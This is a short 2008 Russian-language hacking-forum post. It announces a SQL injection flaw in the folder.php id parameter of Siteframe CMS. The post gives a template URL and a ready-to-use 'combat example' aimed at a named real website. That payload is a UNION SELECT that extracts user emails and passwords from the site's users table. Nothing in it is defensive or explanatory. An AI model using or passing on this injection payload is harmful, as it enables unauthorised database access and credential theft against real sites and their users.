18.07.2008, 17:26
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408
Репутация:
861
|
|
Не уверен, что платная CMS, но тем не менее 
SQL-inj в Siteframe CMS
В скрипте folder.php, параметре id.
Код:
http://site.com/folder.php?id=[sql]
Боевой пример:
http://www.myfourthirds.com/folder.php?id=370+and(1=2)+union+select+1,2,3,4,5, 6,7,8,concat_ws(0x3a,user_email,user_passwd),10,11 +from+users--
Последний раз редактировалось n0ne; 18.07.2008 в 17:31..
|
|
|